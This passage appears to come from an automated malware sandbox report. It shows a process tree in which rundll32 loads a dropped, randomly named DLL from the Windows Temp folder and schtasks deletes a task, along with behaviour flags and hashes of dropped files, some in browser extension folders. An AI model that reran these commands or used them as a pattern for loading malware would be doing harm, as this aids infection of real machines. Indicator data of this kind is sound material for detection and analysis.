C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\qrPPHiDR\tWzaHlO.dll",#1 /mVsite_idkBO 3851181⤵PID:2248
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\qrPPHiDR\tWzaHlO.dll",#1 /mVsite_idkBO 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IypqguOSOyxhMfXuI"3⤵PID:3848
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5204677c072c163574b4c3b76910f0e3d
SHA1e6275477296d9b5e6a4c3948cccfdcbde5a710fe
SHA2567aac7a976426b0b4ce25be25e26096e4c61e086d1a45745845d699bde4e4c281
SHA5124ebb49bbc9336bd822d995f8ddc812ca5f04fc6ae90d79dfce795d7e4add7ee57381b1d484939f1a9fb6b1f0abb73fdbc58769d7b7d1c6df0bc0c31b7bf91765
-
Filesize
2KB
MD57caa796d41dc69759edb83c337127586
SHA1484179e541e637f08c1dd54f74994639d75a6dda
SHA256fadcacb5a21bb4a3082b3ae61226dcac99a548f46ebb5e4281a7b20803db5d0a
SHA51216e834a8433cd8fa010d1cd2dbfea776d39d75b01f5516fe493b9770c0a22f7d51401314e3575c7b286560c3563eadc35c8b4d3b0abdb6433225533bab9fb9b1
-
Filesize
2KB
MD56f18a910f9f02d21e42809fd2c2a52c0
SHA1e2f45ced450bf62ac47ed0854a0d4b2f4000a8c5
SHA256b53cbf9d427a4770906cb27088f6ea79ebdb87629f7eb7dabcd882f32a9f4e74
SHA512870c28f1727bbb0bd742083f85581191a3f3d0d15fe7e4120d1245f7ae2a738351414ab2dd4c1498669c2d0ade1afe8370d3896d1e1a8daa884b8cc729c69dc3
-
Filesize
2KB
MD5aa5f1f78106d1193d3cc802ed2e10b60
SHA124098fb509b5bd052670df5a4ae654896449aabf
SHA2569f33c5ff85537abe1f034073bd721f0e757817a3b5212152b7214608662d0931
SHA51243ab4d22dc7a627ad5630b85354987552f14dcd737ae94f72f6ea163b34e3ecf84a9eea5afc66d1a73708756c3671d1de7be5d40c4c810646954533e22f86d32
-
Filesize
2.0MB
MD521ef945397eb21e11180a1361c57c6c1
SHA17fff29c27fec8c93456fc0625ccf8ed1fc230a28
SHA2568491bbf18795a6466f6b250c557fcd0e62026715580075da4e1656b736c4b484
SHA512d06bbec2c6610f971142f32d3881762af584439dad2d05990221503186f69076f014636c59d6116fa668b165e5b9f40593207fc94fe9415f4b8eff26962c0765
-
Filesize
2KB
MD5ee92e11ef7b4d06eb8da06dfce64dfef
SHA175cccdc7c5d2f71ed99782db1349d489f923ff06
SHA2568dcc974b0d9a1353d23671217f9ed1837dd6b90fbae8ded12ad96ef79fafdbd9
SHA5123f2c14d10100ba42f3129e503679209dc0a40a03a419e7d0c2ad7f5620038304452dcbd3263534db7a248d425c2f6269ed8e0abb5e9e420493577ee37248b6a5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5d65ca51ac421696e278008b60348b2f2
SHA1f1214fc59219dfb78c7063f319f5a83729a8ef36
SHA256f0ac1d06b0e7e41164ec4550be348be3b05c4bbdfbf6a94f120bb59adff789ce
SHA512a565f2276a97694dff2f93270e20c3076237ce058318d61bb856a817a5ba9b4015d50c0b3744057cdedfda6c5699752354c336b7797d72e9238d2828eea29fc6
-
Filesize
35KB
MD51c14339554c41c1c0056226ddb6916bb
SHA1e2932f6b64b22579f6e95d0ac9562c0ec265ce91
SHA256c7c01653ef5814bb44f977dc0ccae0a86c7f66083dbf3951e7e88918ae533bb5
SHA5120cf109bfcbfbb4fa49fd309be022676d3e9fc55600eb1164839d0cc6d53986c105311b9ae8f92222d4a77da98700c44b614553231a61c2d9c304d64d966feb1a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5bbf1b6a9151ca57b51120ec1554a4940
SHA132725ac0e3d55e28271ded1f335f5035fbffb76a
SHA2561fb2d3b0ce9d84d2a4f2660f59e0e54ab659a5fb6bb134cbdca229bb4c4e7386
SHA512cb78b006b2e640a9deb522475997e382210b83643048a38971c63b9baeff699f6f68425c841aaf9ebddb809c23286c3502bda1e5cbc8f19d2593d8441575cc2e
-
Filesize
11KB
MD556977c972c661c74f0699a1376150ecd
SHA135835cfb7c9a524d0982003d51a8263659f0d127
SHA256f7b0a25ce140adfe980ef6330774d5b24579fedcf18be073bc970e09e40ac458
SHA51219a2076a82349e5861d427bb3bd4aafd6823dabfe0714894d188fba2e16592cec5e5c4ad5f802cddbbb2781aee8ff6e2d07aa286c85db5b5051783cf20ac8524
-
Filesize
6.7MB
MD516ae562d94dcce83d2cd6da34596833d
SHA1b6f1087b5f791713001ad414543ba9fa3c12f884
SHA2566fb9d6c67c662830e76ae56dd13ba80fcc60ba2a1af0307776dfce30b995683a
SHA512aa440fd88c57d54b54173c998d02509f4363620fafaaa3907e162a01de61012611bdd4f6e3c7dce525225ae697c54ed6cd35b140d40fcfc76087b9b4fa2b5d87
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5a301373c142740053329597ceaf13c4c
SHA1da1276941f5eb24230ef4ff9a46a2f38801571dc
SHA25629fa611afeec5fa96a713d463e2a0f89380af64a99e3eacb4368dacf5fba68a2
SHA5120eef37e796504a01acfa0f247a5806914a0a46d11e0de46e4f8a29113b8c375e54728389d4cfcf8063bcd6102aa1dd20d95866c0cc7015a97062f6512774e676
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5c860e230dc2740369a9a630b63c63a8b
SHA1d4dfda4dcd60ba08152021adda26789a93603824
SHA2562370896d580a5274528918f06460d133979721c4d4e9145b2a5c1360bdd29877
SHA512412143f5bcc6631f8e443cfa44da52075bfa29c4d95f919825af43e04032f1c8700bf84dc9fbb5d095eedf1ef5875d3f755df96d13d63fcdd29cedf54b6f3cae
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5c6852b77b7d4142a679c1956eacc54a6
SHA131ae507da0ffe3128b5a6e53a9238857a49741ab
SHA2560623e56953267296a316efc73fef3d89e9312016689d35a21727d7b8415c3be2
SHA512d2af4a9fb492f977f98c09fcca66325f74d656ac956cf8493a2c0a9e0a503b3566c4d2bed40beb7d39d178f2a88d9d8a3b88098884807bd2914ebfa37f2e317b
-
Filesize
6.4MB
MD57e7d1734fa1d84d40a690218aa21a449
SHA16648a3e46a62c4f81fa68e58b645d390bc80534a
SHA256c4989b8f312865d911df20e27445f3371d90c1e5f89f0bec54329527f16360b8
SHA512f2d6bca7dd5d94dd2eb3f4633161e745c1f6036a0dd275fd3ddfccb4975ef0598a0579324ffd5dc3a320b1e0e33698b8d4e3f7d185cabf6a6b6ec6a853258f76
-
Filesize
6KB
MD5b2865e186121a2b7eeedff1c3d6e89a3
SHA17794ff3dda1fe3715aed6039abaf96025fcda95d
SHA256b8157cc068c8ce6f196fccc5319dac7e1e19cf4310916ef1abaa035c184d9d11
SHA5122c05acfe45bb77568a41ee34370c69346722b64caf4d98ed2493f7a4f9ce91020e9473b9ffbefa35ba55e9585e2a555618ca19f41a9b689b461e700a2975e9c6